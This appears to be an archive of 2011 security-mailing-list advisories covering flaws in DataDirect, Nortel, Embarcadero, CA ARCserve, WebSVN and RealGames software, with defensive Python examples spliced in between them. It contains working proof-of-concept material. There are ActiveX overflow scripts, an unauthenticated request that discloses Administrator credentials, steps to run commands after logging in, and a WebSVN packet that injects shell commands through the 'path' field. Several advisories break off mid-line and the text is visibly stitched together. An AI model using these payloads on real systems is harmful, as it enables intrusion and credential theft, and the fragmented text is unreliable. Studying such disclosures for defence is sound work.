execute EIP; attach a tool like faultmon to the IE sub-process.

(*)
<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<666;i++){x = x + "A"} // filler character lost in extraction; "A" assumed from the 41414141 EIP above
obj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null;"
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "A"} // filler character lost in extraction; "A" assumed as above
obj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;"
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x=""; for (i=0;i<1666;i++){x = x + "A"} // filler character lost in extraction; "A" assumed as above
obj.ConnectionString ="DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x
+ 

Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit

2011-09-15 Thread nospam
<?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration 
Web Service getSubKeys() Remote SQL Injection Exploit

tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft SQL Server 2005 Express

download uri:
ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso

background:

This software installs a Tomcat http server which listens on
port 8080 for incoming connections. It exposes the
following servlet as declared inside
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :

..
   <servlet-mapping>
      <servlet-name>EyrAPIConfiguration</servlet-name>
      <url-pattern>/EyrAPIConfiguration/*</url-pattern>
   </servlet-mapping>
..

at the following url:

http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf


Vulnerability:

without prior authentication, you can reach a web service
with various methods available, as described inside
the associated wsdl, see file:

c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl

among them, the getSubKeys() method.

Now look at getSubKeys() inside the decompiled
c:\Program Files\[chosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class
:
..
    public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId, String componentId, String sysCompId, String userName)
        throws RemoteException
    {
        StringBuffer xml;
        ConfigOwnerId configOwnerId;
        Connection conn;
        PreparedStatement pStmt;
        ResultSet rs;
        PreparedStatement pStmt2;
        ResultSet rs2;
        log.info((new StringBuilder()).append("Request getSubKeys: iterateSubKeys=").append(iterateSubKeys).append(", includeValues=").append(includeValues).append(", SystemId=").append(systemId).append(", componentId=").append(componentId).append(", sysCompId=").append(sysCompId).append(", userName=").append(userName).toString());
        xml = new StringBuffer("<ConfigurationNodeList>");
        configOwnerId = null;
        conn = null;
        pStmt = null;
        rs = null;
        pStmt2 = null;
        rs2 = null;
        try
        {
            conn = SiteDatabase.getInstance().getConnection();
            if(EyrAPIProperties.getInstance().getProperty("database", "MSSQLServer").equalsIgnoreCase("Oracle"))
            {
                if(componentId.compareToIgnoreCase("") == 0)
                    componentId = "*";
                if(systemId.compareToIgnoreCase("") == 0)
                    systemId = "*";
                if(sysCompId.compareToIgnoreCase("") == 0)
                    sysCompId = "*";
                if(userName.compareToIgnoreCase("") == 0)
                    userName = "*";
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = '").append(componentId).append("' AND ").append("nvl(SystemID, '*') = '").append(systemId).append("' AND ").append("nvl(SysCompID, '*') = '").append(sysCompId).append("' AND ").append("nvl(UserName, '*') = '").append(userName).append("'").toString());
                rs = pStmt.executeQuery();
            } else
            {
                pStmt = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = '").append(unpunctuate(componentId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SystemID), '') = '").append(unpunctuate(systemId)).append("' AND ").append("ISNULL(CONVERT(varchar(36), SysCompID), '') = '").append(unpunctuate(sysCompId)).append("' AND ").append("ISNULL(UserName, '') = '").append(unpunctuate(userName)).append("'").toString());
                rs = pStmt.executeQuery();
            }
            if(rs.next())
            {
                String strConfigOwnerId = rs.getString(1);
                if(!rs.wasNull())
                    configOwnerId = new ConfigOwnerId(strConfigOwnerId);
                pStmt2 = conn.prepareStatement((new StringBuilder()).append("SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = '").append(configOwnerId.toString()).append("'").toString());
                for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues)));
            }
        }
        catch(SQLException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        catch(GenericDatabaseException e)
        {
            String msg = "Unable to get subkeys";
            log.error(msg, e);
            throw new RemoteException(msg, e);
        }
        DbHelper.closeStatement(log, pStmt);
        DbHelper.closeResultSet(log, rs);
        DbHelper.closeStatement(log, pStmt2);
        DbHelper.closeResultSet(log, rs2);
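
The point of the decompiled getSubKeys() above is that prepareStatement() is called on text that already has the caller's arguments spliced into it, so the statement is "prepared" only after any quote in those arguments has become part of the SQL. As an added Python example (not Nortel/Avaya code) the same lookup is shown both ways against a constructed in-memory SQLite table standing in for ConfigOwnerView; nvl() from the Oracle branch is written as SQLite's ifnull(), and the rows are made up.

```python
"""Binding the getSubKeys() arguments instead of splicing them into SQL.

Added example, not Nortel/Avaya code. The table, its rows and the
SQLite stand-in for the site database are constructed; nvl() from the
Oracle branch is written as SQLite's ifnull()."""
import sqlite3

# The servlet's Oracle-branch statement, built by string concatenation.
CONCAT_TEMPLATE = (
    "SELECT ConfigOwnerID FROM ConfigOwnerView WHERE "
    "ifnull(ComponentID, '*') = '{componentId}' AND "
    "ifnull(SystemID, '*') = '{systemId}' AND "
    "ifnull(SysCompID, '*') = '{sysCompId}' AND "
    "ifnull(UserName, '*') = '{userName}'"
)

# The same statement with bind parameters: the text never changes with input.
BOUND_QUERY = (
    "SELECT ConfigOwnerID FROM ConfigOwnerView WHERE "
    "ifnull(ComponentID, '*') = ? AND "
    "ifnull(SystemID, '*') = ? AND "
    "ifnull(SysCompID, '*') = ? AND "
    "ifnull(UserName, '*') = ?"
)


def build_site_db() -> sqlite3.Connection:
    """In-memory ConfigOwnerView with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ConfigOwnerView (ConfigOwnerID TEXT, ComponentID TEXT, "
        "SystemID TEXT, SysCompID TEXT, UserName TEXT)"
    )
    conn.executemany(
        "INSERT INTO ConfigOwnerView VALUES (?, ?, ?, ?, ?)",
        [("owner-1", "comp-a", "sys-1", None, None),
         ("owner-2", "comp-b", "sys-2", None, "alice")],
    )
    return conn


def wildcard(value: str) -> str:
    """The servlet maps an empty argument to the '*' marker before querying."""
    return "*" if value == "" else value


def lookup_concatenated(conn, componentId, systemId, sysCompId, userName):
    """Mirrors the decompiled code: prepareStatement() receives text that
    already contains the caller's values, so a quote in any of them is
    parsed as SQL rather than treated as data."""
    sql = CONCAT_TEMPLATE.format(
        componentId=wildcard(componentId), systemId=wildcard(systemId),
        sysCompId=wildcard(sysCompId), userName=wildcard(userName))
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, componentId, systemId, sysCompId, userName):
    """Hardened form: values travel as parameters, separate from the statement."""
    params = tuple(wildcard(v) for v in (componentId, systemId, sysCompId, userName))
    return [row[0] for row in conn.execute(BOUND_QUERY, params)]


def demo() -> dict:
    """Run both forms on a normal user name and one containing an apostrophe."""
    conn = build_site_db()
    try:
        concat_quote = lookup_concatenated(conn, "comp-b", "sys-2", "", "O'Brien")
    except sqlite3.OperationalError as exc:
        concat_quote = "OperationalError: " + str(exc)
    return {
        "bound_plain": lookup_bound(conn, "comp-a", "sys-1", "", ""),
        "concat_plain": lookup_concatenated(conn, "comp-a", "sys-1", "", ""),
        "bound_quote": lookup_bound(conn, "comp-b", "sys-2", "", "O'Brien"),
        "concat_quote": concat_quote,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

A user name such as O'Brien is enough to show the difference: the concatenated form fails with a syntax error because the apostrophe terminates the SQL string literal, which is exactly the property a crafted value abuses, while the bound form simply finds no matching row. The MSSQL branch's unpunctuate() helper is an attempt to strip such characters, but binding makes the question of what it strips irrelevant.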

Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET Extension Factory ActiveX Control Remote Code Execution

2011-09-07 Thread nospam

See: CVE-2011-2217
reference url: http://www.securityfocus.com/bid/48099

The mentioned product is vulnerable to the same issue.

download url: https://downloads.embarcadero.com/free/er_studio_portal

ActiveX settings: 
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1
CLSID:  {658ED6E7-0DA1-4ADD-B2FB-095F08091118}
Binary path: D:\Program 
Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll
Safe for scripting (registry): true
Safe for initialize (registry): true

poc:

<script>
var obj = new ActiveXObject("TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1");
</script>

then the dll will try to call into an uninitialized memory region
which is reachable by an attacker through heap spray.

//rgod


CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution

2011-07-26 Thread nospam
<?php
/*
CA ARCserve D2D r15 GWT RPC Request Auth Bypass /
Credentials Disclosure and Commands Execution PoC

product homepage: http://arcserve.com/us/default.aspx

file tested: CA_ARCserve_D2D_Setup_BMR.zip

tested against: Microsoft Windows Server 2003 r2 sp2

This software installs a Tomcat HTTP server which listens
on port 8014 for incoming connections (this port is also
added automatically to firewall exceptions to exacerbate
the vulnerability I am going to describe).
It uses a GWT RPC (Google Web Toolkit Remote Procedure
Call) mechanism to receive messages from the Administrator
browser.

Without prior authentication, a remote user with access
to the web server can send a POST request to the homepageServlet
servlet containing the getLocalHost message and the correct
filename of a certain descriptor to disclose the
username and password of the target application.
This username and password pair are Windows credentials
with Administrator privileges, requested during
the ARCserve installation process (it clearly says this, a user
from the Administrators group).

This works with the mentioned software perfectly
installed and configured and after the Administrator user has
logged in *one time each Tomcat session, logged out or not*
(which I think is easily exploitable against a production
service running twenty four hours a day). You could also choose
to resend the request indefinitely, waiting for the Administrator
to be logged in.

Example packet:

POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D

5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|

Note that '2C6B33BED38F825C48AE73C093241510' is a static value
which represents a filename of a gwt rpc descriptor which can be found inside 
the default path:

C:\Program Files\CA\ARCserve 
D2D\TOMCAT\webapps\ROOT\contents\2C6B33BED38F825C48AE73C093241510.gwt.rpc

Note also that this packet does not contain any session id.

Response packet:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT

//OK[0,17,16,8,15,14,8,13,-3,12,11,8,10,9,8,7,0,6,5,0,4,3,8,2,1,1,["com.ca.arcflash.ui.client.model.TrustHostModel/1126245943",
"com.extjs.gxt.ui.client.data.RpcMap/3441186752","port","java.lang.Integer/3438268394","Selected","java.lang.Boolean/476441737",
"hostName","java.lang.String/2004016611","RGOD_9SG","uuid","1a580961-1aa7-4225-b3aa-a522649c16ec","type",
"user","Administrator","password","MY_PASSWORD","Protocol"],0,5]


Clear text! Clear text!!!

Username - Administrator
Password - MY_PASSWORD

A remote attacker could then login to the affected application
then execute arbitrary commands with Administrator group privileges
in the following way:

Browse Backup settings;
Click Advanced tab;
Check Run a command before backup is started;
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password
(you can use the same you had before);
Select an existing backup destination in the Protection Settings tab;
Browse to the main page and click Backup Now;
Select Incremental Backup and press OK;
calc.exe is launched various times.

Other attacks are possible.

Vulnerable code and explanation:


web.xml :
..
<servlet>
    <servlet-name>homepageServlet</servlet-name>
    <servlet-class>com.ca.arcflash.ui.server.HomepageServiceImpl</servlet-class>
    <load-on-startup>1</load-on-startup>
</servlet>

<servlet-mapping>
    <servlet-name>homepageServlet</servlet-name>
    <url-pattern>/contents/service/homepage</url-pattern>
</servlet-mapping>
..

the decompiled HomepageServiceImpl.class :

..
    public TrustHostModel getLocalHost()
        throws BusinessLogicException, ServiceConnectException, ServiceInternalException
    {
        try
        {
            TrustedHost trustedhost = getLocalWebServiceClient().getLocalHostAsTrust();
            TrustHostModel trusthostmodel = ConvertToModel(trustedhost);
            return trusthostmodel;
        }
        catch(AxisFault axisfault)
        {
            axisfault.printStackTrace();
        }
        return null;
    }
..

the decompiled WebServiceClient.class :

..
    public TrustedHost getLocalHostAsTrust()
        throws AxisFault
    {
        Object aobj[] = invokeWebMethod("getLocalHostAsTrust", new Object[0], new Class[] { //
            com/ca/arcflash/webservice/data/TrustedHost
        });
        return (TrustedHost)aobj[0];
    }
..

a request to the FlashServiceImpl Axis2 Web Service is originated
note that the ip address originating the request is 
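
The request above reaches getLocalHost() with no session at all, so the natural control is to look at what the GWT-RPC body asks for before the servlet acts on it. The following Python is an added example, not CA ARCserve code: it decodes the request body format shown in the example packet (version|flags|string-table|1-based references) and refuses the protected method when no session cookie is present. The cookie name JSESSIONID (Tomcat's default) is an assumption, and the sample request is constructed from the packet in the advisory.

```python
"""Gating GWT-RPC methods on an existing session.

Added example, not CA ARCserve code. It parses the request body format shown
in the advisory and refuses getLocalHost unless the request carries a session
cookie; the cookie name (JSESSIONID, Tomcat's default) is an assumption."""
from urllib.parse import unquote

# (service interface, method) pairs that must never be served anonymously.
PROTECTED_METHODS = {
    ("com.ca.arcflash.ui.client.homepage.HomepageService", "getLocalHost"),
}
SESSION_COOKIE = "JSESSIONID"  # assumed name of the container's session cookie


def parse_gwt_rpc(body: str) -> dict:
    """Decode a GWT-RPC request body.

    Wire layout: version|flags|N|<N table strings>|moduleBase#|policyHash#|
    interface#|method#|paramCount|...  The '#' fields are 1-based indexes into
    the string table, which is why the sample ends in |1|2|3|4|0|."""
    fields = body.split("|")
    if len(fields) < 3:
        raise ValueError("truncated GWT-RPC header")
    version, flags, count = int(fields[0]), int(fields[1]), int(fields[2])
    table = fields[3:3 + count]
    refs = fields[3 + count:]
    if len(table) != count or len(refs) < 5:
        raise ValueError("string table or reference section truncated")

    def ref(token: str) -> str:
        idx = int(token)
        if not 1 <= idx <= count:
            raise ValueError("string table index out of range")
        return table[idx - 1]

    return {
        "version": version,
        "flags": flags,
        "module_base": ref(refs[0]),
        "policy_hash": ref(refs[1]),
        "interface": ref(refs[2]),
        "method": ref(refs[3]),
        "param_count": int(refs[4]),
    }


def parse_cookies(header: str) -> dict:
    """Split a Cookie header into a name -> URL-decoded value mapping."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = unquote(value)
    return cookies


def authorize(headers: dict, body: str) -> tuple:
    """Return ("allow" | "deny", method); protected methods need a session."""
    call = parse_gwt_rpc(body)
    authenticated = SESSION_COOKIE in parse_cookies(headers.get("Cookie", ""))
    key = (call["interface"], call["method"])
    if key in PROTECTED_METHODS and not authenticated:
        return ("deny", call["method"])
    return ("allow", call["method"])


# Constructed from the advisory's example packet.
SAMPLE_HEADERS = {
    "Content-Type": "text/x-gwt-rpc; charset=utf-8",
    "Cookie": "donotshowgettingstarted=%7B%22state%22%3Atrue%7D",
}
SAMPLE_BODY = (
    "5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|"
    "com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|"
)

if __name__ == "__main__":
    print(parse_gwt_rpc(SAMPLE_BODY)["method"], authorize(SAMPLE_HEADERS, SAMPLE_BODY))
```

The same parser is what a detection rule would use on captured traffic: a request whose decoded method is getLocalHost and whose Cookie header carries no session is the exact shape of the packet in the advisory, regardless of the User-Agent or the other cookie the example sends.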

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

2011-06-03 Thread nospam
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection 
Vulnerability

tested against: Microsoft Windows Server R2 SP2 
PHP 5.3.6 VC9 with magic_quotes_gpc = off (default)
Apache 2.2.17 VC9

Introduction:
This is a very special vulnerability, given the incredibly high number
of machines involved. This can be verified by submitting the following
queries to Google:

Powered by WebSVN * and Subversion
Powered by WebSVN 2.3.2 and Subversion

homepage url: http://websvn.tigris.org/

Description says:
WebSVN offers a view onto your subversion repositories that's been designed to 
reflect the Subversion methodology. You can view the log of any file or 
directory
and see a list of all the files changed, added or deleted in any given revision.
You can also view compare two versions of a file so as to see exactly what was 
changed in a particular revision.

Since it's written using PHP, WebSVN is very portable and easy to install.

Vulnerability:

Without prior authentication, if the 'allowDownload' option is enabled
in config.php, meaning that a tarball download is allowed across all the
repositories (not uncommon), an attacker can invoke the dl.php script
and pass a well formed 'path' argument to execute arbitrary
commands against the underlying operating system.


Vulnerable code:

look at dl.php, lines 114-139:

..
} else {
    @unlink($tempDir);
    mkdir($tempDir);
    // Create the name of the directory being archived
    $archiveName = $path;
    $isDir = (substr($archiveName, -1) == '/');
    if ($isDir) {
        $archiveName = substr($archiveName, 0, -1);
    }
    $archiveName = basename($archiveName);
    if ($archiveName == '') {
        $archiveName = $rep->name;
    }
    $plainfilename = $archiveName;
    $archiveName .= '.r'.$rev;

    // Export the requested path from SVN repository to the temp directory
    $svnExportResult = $svnrep->exportRepositoryPath($path, $tempDir.DIRECTORY_SEPARATOR.$archiveName, $rev, $peg);

    if ($svnExportResult != 0) {
        header('HTTP/1.x 500 Internal Server Error', true, 500);
        error_log('svn export failed for: '.$archiveName);
        print 'svn export failed for '.xml_entities($archiveName).'.';
        removeDirectory($tempDir);
        exit(0);
    }
..


then look at exportRepositoryPath() function inside ./include/svnlook.php, 
lines 879-896:
..
// {{{ exportDirectory
//
// Exports the directory to the given location

function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') {
    $cmd = $this->svnCommandString('export', $path, $rev, $peg).' '.quote($filename); //<---
    $retcode = 0;

    execCommand($cmd, $retcode); //<--

    if ($retcode != 0) {
        global $lang;
        error_log($lang['BADCMD'].': '.escape($cmd));
    }
    return $retcode;
}

// }}}
..

again look at execCommand() function inside ./include/command.php, lines 
107-123:

..
// {{{ execCommand

function execCommand($cmd, &$retcode) {
    global $config;

    // On Windows machines, the whole line needs quotes round it so that it's
    // passed to cmd.exe correctly
    // Since php 5.3.0 the quoting seems to be done internally

    if ($config->serverIsWindows && version_compare(PHP_VERSION, '5.3.0alpha') === -1) {
        $cmd = '"'.$cmd.'"'; // nonsense ...
    }

    return @exec($cmd, $tmp, $retcode); //<- boom
}

// }}}
..


also, look at quote() inside ./include/command.php:

..
// {{{ quote
//
// Quote a string to send to the command line

function quote($str) {
    global $config;

    if ($config->serverIsWindows) {
        return '"'.$str.'"'; //<--- !!!
    } else {
        return escapeshellarg($str); // this should work properly on Linux instead
    }
}

// }}}
..


Example packet:

POST /websvn/dl.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: 192.168.0.1
Accept: */*
Cookie: storedsesstemplate=.%00; storedtemplate=.%00;
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

path=./../../x%22%7Cver%3Esuntzu.txt%7C%22


the resulting command line is like this:

c:\SVN\bin\svn --non-interactive --config-dir C:\SVN\tmp\export 
URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./../../x%22%7Cver%3Esuntzu.txt%7C%22@
 "C:\Documents and Settings\Administrator\Local Settings\Temp\web554.tmp\x"|ver>suntzu.txt|".r"

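The quoting mismatch described above, as an added example that is not part of the advisory or of WebSVN: a Python emulation of the two quote() strategies from include/command.php (the naive double-quote wrap, and PHP's Windows escapeshellarg() behaviour, which is assumed here to replace embedded double quotes and percent signs with spaces) next to a cmd.exe-style scanner that reports operators left outside double quotes. The test input is the URL-decoded 'path' value from the example packet; the function names (naive_quote, breaks_out, and so on) are mine.

```python
# Added example (not WebSVN code): emulate the two quoting strategies in
# include/command.php and check whether a value can escape its quotes.

# Characters cmd.exe treats as operators when they occur outside double quotes
CMD_METACHARS = set('|&<>^')


def naive_quote(value: str) -> str:
    """WebSVN 2.3.2 quote() on Windows: wrap in double quotes, no escaping."""
    return '"' + value + '"'


def php_windows_escapeshellarg(value: str) -> str:
    """Emulation (assumption: PHP 5.x behaviour) of escapeshellarg() on
    Windows: embedded double quotes and percent signs become spaces, then
    the whole value is wrapped in double quotes."""
    return '"' + value.replace('"', ' ').replace('%', ' ') + '"'


def unquoted_metachars(cmdline: str) -> list:
    """Walk a command line the way cmd.exe does: a double quote toggles
    quote mode, and operators only act while outside quotes.
    Returns (offset, char) for every operator that would be interpreted."""
    hits = []
    in_quotes = False
    for i, ch in enumerate(cmdline):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_METACHARS and not in_quotes:
            hits.append((i, ch))
    return hits


def breaks_out(quoter, value: str) -> bool:
    """True if `value`, quoted by `quoter` and appended to a command line,
    leaves any shell operator outside double quotes."""
    return bool(unquoted_metachars('svn export ' + quoter(value)))


# Constructed input: the URL-decoded 'path' value from the advisory's packet.
ADVISORY_PAYLOAD = 'x"|ver>suntzu.txt|"'

if __name__ == '__main__':
    for name, quoter in (('naive_quote', naive_quote),
                         ('escapeshellarg', php_windows_escapeshellarg)):
        print(f'{name:15} {quoter(ADVISORY_PAYLOAD)!r:30} breaks out: '
              f'{breaks_out(quoter, ADVISORY_PAYLOAD)}')
```

The naive wrap turns the payload into `"x"|ver>suntzu.txt|""`: the second quote closes the argument, so the pipe and the redirect are parsed by cmd.exe. Better quoting is only half a fix; the durable one is to validate 'path' against the small character set a repository path legitimately needs before it reaches any command string, and to keep in mind that escapeshellarg() on Windows silently mangles legitimate `"` and `%` characters rather than failing loudly.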

Re: ZDI-11-117: McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability

2011-04-14 Thread nospam
McAfee stated:

[quote]
 Impact of Vulnerability:
Disabling Anti-Virus, adding unwanted exclusions
[/quote]

When submitting this bug to ZDI, I made available two reliable post-bypass 
proof-of-concepts: 
- a static perl code injection exploit using the 'args' argument of 
saveTopImagelogos.cgi
- an upload and execute exploit using uploadFile.cgi

In both cases, the result was remote command execution with SYSTEM privileges. 
This was tested against the default Apache installation.
ZDI did not acquire post-auth vulnerabilities, so I was considering disclosing 
them after the patch was out but, in the end, not.

I'm saying this to allow people to classify this vulnerability with the correct 
metrics.

rgod


RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities

2011-04-04 Thread nospam
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control 
(InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution 
and Code Execution Vulnerabilities

tested against Internet Explorer 9, Vista sp2

download url: http://www.gamehouse.com/

background:

When choosing to play with these online games ex. the game called
My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life )
you download an installer called 
GameHouse-Installer_am-myfarmlife_gamehouse_.exe

This setup program installs an ActiveX with the following settings:

CLSID: {80AB3FB6-9660-416C-BE8D-0E2E8AC3138B}
Progid: StubbyUtil.ShellCtl.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

This control is safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from
remote.

vulnerability:

This control has four methods implemented insecurely:

ShellExec()  - allows to launch arbitrary commands
ShellExecRunAs() - allows to launch arbitrary commands
CreateShortcut() - allows to create arbitrary executable files inside the 
automatic
startup folders
CopyDocument()   - allows to copy arbitrary executable files from a remote
network share to local folders, ex. automatic startup 
folders

other attacks are possible including information disclosure and file deletion, 
see typelib:

class IShellCtl { /* GUID={0D60A064-2009-4623-8FC1-F99CAC01037E} */
/* DISPID=1610612736 */
function QueryInterface(
/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_PTR [26] [out] -- VT_PTR [26]  */ $ppvObj 
)
{
}
/* DISPID=1610612737 */
/* VT_UI4 [19] */
function AddRef(
)
{
}
/* DISPID=1610612738 */
/* VT_UI4 [19] */
function Release(
)
{
}
/* DISPID=1610678272 */
function GetTypeInfoCount(
/* VT_PTR [26] [out] -- VT_UINT [23]  */ $pctinfo 
)
{
}
/* DISPID=1610678273 */
function GetTypeInfo(
/* VT_UINT [23] [in] */ $itinfo,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_PTR [26]  */ $pptinfo 
)
{
}
/* DISPID=1610678274 */
function GetIDsOfNames(
/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_PTR [26] [in] -- VT_PTR [26]  */ $rgszNames,
/* VT_UINT [23] [in] */ $cNames,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_I4 [3]  */ $rgdispid 
)
{
}
/* DISPID=1610678275 */
function Invoke(
/* VT_I4 [3] [in] */ $dispidMember,
/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_UI2 [18] [in] */ $wFlags,
/* VT_PTR [26] [in] -- ? [29]  */ $pdispparams,
/* VT_PTR [26] [out] -- VT_VARIANT [12]  */ $pvarResult,
/* VT_PTR [26] [out] -- ? [29]  */ $pexcepinfo,
/* VT_PTR [26] [out] -- VT_UINT [23]  */ $puArgErr 
)
{
}
/* DISPID=1 */
function CreateShortcut(
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $name,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $target,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $icon,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $workingDir,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $args 
)
{
/* method CreateShortcut */
}
/* DISPID=2 */
function DeleteShortcut(
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $name 
)
{
/* method DeleteShortcut */
}
/* DISPID=3 */
/* VT_BSTR [8] */
function ModuleFileName(
)
{
/* method ModuleFileName */
}
/* DISPID=4 */
/* VT_BSTR [8] */
function GetSpecialFolder(
/* VT_UI4 [19] [in] */ $__MIDL_0025 
)
{
/* method GetSpecialFolder */
}
/* DISPID=5 */
/* VT_BOOL [11] */
function CheckWnd(
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $__MIDL_0026 
)
{
/* method CheckWnd */
}
/* DISPID=6 */
/* VT_BSTR [8] */
function ExistingTPS(
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $__MIDL_0028 
)
{
/* method ExistingTPS */
}
/* DISPID=7 */
function SetWorkingDir(
/* VT_PTR [26] [in] -- VT_BSTR [8]  

RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities

2011-04-04 Thread nospam
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control 
(InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution 
Vulnerabilities

tested against Internet Explorer 9, Vista sp2

download url: http://www.gamehouse.com/

background:

When choosing to play with these online games ex. the game called
My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life )
you download an installer called 
GameHouse-Installer_am-myfarmlife_gamehouse_.exe

This setup program installs an ActiveX with the following settings:

CLSID: {5818813E-D53D-47A5-ABBB-37E2A07056B5}
Progid: StubbyUtil.ProcessMgr.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

This control is safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from
remote.

vulnerability:

This control has four methods implemented insecurely:

CreateVistaTaskLow()  - allows to launch arbitrary commands
Exec()- allows to launch arbitrary commands
ExecLow() - allows to launch arbitrary commands
ShellExec()   - allows to launch arbitrary executables

other attacks are possible , 
see typelib:

class IProcessMgr { /* GUID={860450DB-79C1-44E4-96E0-C89144E4B444} */
/* DISPID=1610612736 */
function QueryInterface(
/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_PTR [26] [out] -- VT_PTR [26]  */ $ppvObj 
)
{
}
/* DISPID=1610612737 */
/* VT_UI4 [19] */
function AddRef(
)
{
}
/* DISPID=1610612738 */
/* VT_UI4 [19] */
function Release(
)
{
}
/* DISPID=1610678272 */
function GetTypeInfoCount(
/* VT_PTR [26] [out] -- VT_UINT [23]  */ $pctinfo 
)
{
}
/* DISPID=1610678273 */
function GetTypeInfo(
/* VT_UINT [23] [in] */ $itinfo,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_PTR [26]  */ $pptinfo 
)
{
}
/* DISPID=1610678274 */
function GetIDsOfNames(
